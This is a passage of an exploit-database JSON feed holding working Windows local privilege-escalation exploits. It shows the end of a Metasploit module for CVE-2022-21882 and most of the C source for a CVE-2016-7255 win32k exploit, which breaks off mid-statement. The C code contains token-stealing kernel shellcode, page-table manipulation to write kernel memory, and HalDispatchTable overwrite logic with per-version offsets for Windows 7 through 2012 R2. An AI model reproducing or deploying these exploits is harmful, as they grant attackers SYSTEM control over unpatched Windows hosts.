'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/37433", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-04T07:12:42", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2017-01-11T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel - win32k.sys NtSetWindowLongPtr Privilege Escalation (MS16-135) (2)", "bulletinFamily": 
"exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2017-01-11T00:00:00", "id": "1337DAY-ID-26645", "href": "https://0day.today/exploit/description/26645", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n \r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41015.exe\r\n*/\r\n \r\n// ricklarabee.blogspot.com\r\n \r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n \r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n \r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n \r\n// Credits: [email\u00a0protected]: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n \r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n \r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n \r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n \r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n \r\n////////////////////////////////////////////////////////\r\n// 
Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n \r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n \r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n \r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n \r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n OUT PULONG Interval);\r\n \r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n //0xcc,\r\n 0xfa, // CLI\r\n 0x9c, // PUSHFQ\r\n 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer\r\n 0x50, // PUSH RAX\r\n 0x51, // PUSH RCX\r\n 0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n 0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX\r\n 0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID\r\n 0x53, // PUSH RBX\r\n \r\n 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188\r\n 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n 0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n //<tag>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR 
[RAX-0x8] // UniqueProcessID\r\n 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4\r\n 0x75, 0xf3, // JNE <tag>\r\n 0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n \r\n 0x53, // PUSH RBX\r\n //<tag2>\r\n 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]\r\n 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n 0x39, 0xcb, // CMP EBX, ECX // our PID\r\n 0x75, 0xf5, // JNE <tag2>\r\n 0x5b, // POP RBX\r\n 0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX\r\n \r\n 0x5b, // POP RBX\r\n 0x59, // POP RCX\r\n 0x58, // POP RAX\r\n 0x9d, // POPFQ\r\n \r\n 0xfb, // STI\r\n 0xff, 0xe0 // JMP RAX\r\n};\r\n \r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList = NULL;\r\n ULONG ulRet = 0;\r\n \r\n do\r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n \r\n va_start(VaList, Format);\r\n \r\n _vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n \r\n \r\n OutputDebugStringA(pszDbgBuff);\r\n \r\n va_end(VaList);\r\n \r\n } while (FALSE);\r\n \r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n pszDbgBuff = NULL;\r\n }\r\n \r\n return ulRet;\r\n}\r\n \r\n \r\nint _sim_key_down(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_key_up(WORD wKey)\r\n{\r\n INPUT stInput = { 0 };\r\n \r\n do\r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n \r\n SendInput(1, &stInput, sizeof(stInput));\r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\nint _sim_alt_shift_esc()\r\n{\r\n int i = 0;\r\n \r\n 
do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n \r\n \r\n } while (FALSE);\r\n \r\n return 0;\r\n}\r\n \r\n \r\n \r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n \r\n \r\n int nFinalRet = -1;\r\n \r\n do\r\n {\r\n _sim_key_down(VK_MENU);\r\n _sim_key_down(VK_SHIFT);\r\n \r\n \r\n for (i = 0; i < nCount; i++)\r\n {\r\n _sim_key_down(VK_TAB);\r\n _sim_key_up(VK_TAB);\r\n \r\n Sleep(1000);\r\n \r\n }\r\n \r\n \r\n _sim_key_up(VK_MENU);\r\n _sim_key_up(VK_SHIFT);\r\n } while (FALSE);\r\n \r\n return nFinalRet;\r\n}\r\n \r\nint _sim_alt_esc(int count)\r\n{\r\n int i = 0;\r\n \r\n for (i = 0; i<count; i++)\r\n {\r\n _sim_key_down(VK_MENU);\r\n //_sim_key_down(VK_SHIFT);\r\n \r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_down(VK_ESCAPE);\r\n _sim_key_up(VK_ESCAPE);\r\n \r\n _sim_key_up(VK_MENU);\r\n //_sim_key_up(VK_SHIFT);\r\n \r\n }\r\n \r\n return 0;\r\n}\r\n \r\n \r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = { 0 };\r\n \r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n \r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n \r\n void* pId = NULL;\r\n MSG stMsg = { 0 };\r\n \r\n UINT64 value = 0;\r\n \r\n do\r\n {\r\n \r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n \r\n if (0 == RegisterClassExW(&stWC))\r\n {\r\n break;\r\n }\r\n \r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n \r\n hWndChild = CreateWindowExW(\r\n 0,\r\n 
pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n \r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n \r\n#ifdef _WIN64\r\n pId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n pId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n \r\n SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n \r\n DbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n \r\n ShowWindow(hWndParent, SW_SHOWNORMAL);\r\n \r\n SetParent(hWndChild, GetDesktopWindow());\r\n \r\n SetForegroundWindow(hWndChild);\r\n \r\n _sim_alt_shift_tab(4);\r\n \r\n SwitchToThisWindow(hWndChild, TRUE);\r\n \r\n _sim_alt_shift_esc();\r\n \r\n while (GetMessage(&stMsg, NULL, 0, 0)) {\r\n \r\n SetFocus(hWndParent);\r\n _sim_alt_esc(20);\r\n SetFocus(hWndChild);\r\n _sim_alt_esc(20);\r\n \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n \r\n if (value != 0) {\r\n break;\r\n }\r\n \r\n \r\n __try {\r\n value = *(UINT64 *)PML4_SELF_REF;\r\n if ((value & 0x67) == 0x67) {\r\n printf(\"Value Self Ref = %llx\\n\", value);\r\n break;\r\n }\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER) {\r\n continue;\r\n }\r\n \r\n }\r\n \r\n \r\n } while (FALSE);\r\n \r\n if (NULL != hWndParent)\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n \r\n if (NULL != hWndChild)\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n \r\n UnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n \r\n return 0;\r\n}\r\n \r\nUINT64 get_pxe_address(UINT64 address) {\r\n UINT entry = PML4_SELF_REF_INDEX;\r\n UINT64 result = address >> 9;\r\n UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n result = result | lower_boundary;\r\n result = result & upper_boundary;\r\n return result;\r\n}\r\n \r\nUINT64 
look_free_entry_pml4(void) {\r\n // Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n int offset = 0xF00;\r\n UINT64 pml4_search = PML4_BASE + offset;\r\n while (offset < 0xFF8)\r\n {\r\n if ((*(PVOID *)pml4_search) == 0x0)\r\n {\r\n // This is a NULL (free) entry\r\n break;\r\n }\r\n offset += 8;\r\n pml4_search = PML4_BASE + offset;\r\n }\r\n return pml4_search;\r\n}\r\n \r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n UINT64 index = (spurious_offset & 0xFFF) / 8;\r\n UINT64 result = (\r\n ((UINT64)0xFFFF << 48) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n ((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n (index << 12)\r\n );\r\n return result;\r\n}\r\n \r\n \r\n \r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n \r\n /*\r\n 1: kd> !pte ffffffff`ffd00000\r\n VA ffffffffffd00000\r\n PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n */ \r\n \r\n UINT64 pte = get_pxe_address(virtual_address);\r\n int pte_offset = pte & 0xFFF;\r\n //printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n \r\n UINT64 pde = get_pxe_address(pte);\r\n int pde_offset = pde & 0xFFF;\r\n //printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n \r\n UINT64 pdpte = get_pxe_address(pde);\r\n int pdpte_offset = pdpte & 0xFFF;\r\n //printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n \r\n UINT64 pml4e = get_pxe_address(pdpte);\r\n int pml4e_offset = pml4e & 0xFFF;\r\n //printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n \r\n UINT64 spurious_offset = look_free_entry_pml4();\r\n printf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n UINT64 f_e_pml4 = spurious_offset;\r\n UINT64 spurious_pt = 
calculate_spurious_pt_address(spurious_offset);\r\n printf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n printf(\"--------------------------------------------------\\n\\n\");\r\n \r\n \r\n //Read the physical address of pml4e \r\n UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n printf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n // Change the PxE\r\n pml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n \r\n printf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pdpte\r\n UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n printf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n // Change the PxE\r\n pdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pde\r\n UINT64 pde_addr = spurious_pt + pde_offset;\r\n UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n printf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n // Change the PxE\r\n pde_pfn = pde_pfn | 0x67; // Set U/S\r\n printf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n \r\n //Read the physical address of pte\r\n UINT64 pte_addr = spurious_pt + pte_offset;\r\n UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n printf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n // Change the PxE\r\n pte_pfn = pte_pfn | 0x67; // Set U/S\r\n pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \r\n if (patch_original) {\r\n printf(\"*** Patching the original location to enable NX...\\n\");\r\n *(PVOID *)(spurious_pt + 
pte_offset) = (PVOID)pte_pfn;\r\n }\r\n \r\n printf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn);\r\n *((PVOID *)spurious_offset) = (PVOID)pte_pfn;\r\n Sleep(0x1); // Sleep for TLB refresh;\r\n printf(\"\\n\\n\");\r\n return spurious_pt;\r\n}\r\n \r\nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {\r\n printf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address);\r\n UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteAddress += (target_address & 0xFFF);\r\n printf(\"OverwriteAddress: %llx\\n\", OverwriteAddress);\r\n return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));\r\n}\r\n \r\nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {\r\n UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);\r\n OverwriteTarget += (target_address & 0xFFF);\r\n UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;\r\n printf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address);\r\n *(PVOID *)target = (PVOID)hook_address;\r\n}\r\n \r\n \r\nUINT64 store_shellcode_in_hal(void) {\r\n //// Finally store the shellcode on the HAL\r\n \r\n UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;\r\n UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);\r\n \r\n printf(\"HAL address: %llx\\n\", hal_heap);\r\n // 0xffffffffffd00d50 this is a good offset to store shellcode \r\n // 0xfff - 0xd50 = 0x2af space\r\n \r\n memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n return 0xffffffffffd00d50;\r\n}\r\n \r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION 
pSystemModuleInformation;\r\n \r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n \r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n \r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n \r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n \r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n \r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n \r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n \r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n \r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 
0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n \r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n \r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n \r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n \r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n \r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n \r\n return HalDispatchTable;\r\n}\r\n \r\nint __cdecl main(int argc, char** argv)\r\n{\r\n TCHAR pre_username[256];\r\n TCHAR post_username[256];\r\n DWORD size = 256;\r\n ULONG Interval = 0;\r\n HMODULE hNtDll = NULL;\r\n UINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n int osversion;\r\n \r\n if (argc != 2) {\r\n printf(\"Please enter an OS version\\n\");\r\n printf(\"The following OS'es are supported:\\n\");\r\n printf(\"\\t[*] 7 - Windows 7\\n\");\r\n printf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n printf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n printf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n printf(\"\\n\");\r\n printf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n return -1;\r\n }\r\n \r\n osversion = _strtoui64(argv[1], NULL, 10);\r\n \r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - 
[+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; // QueryIntervalProfile \r\n }\r\n else if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n else if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 
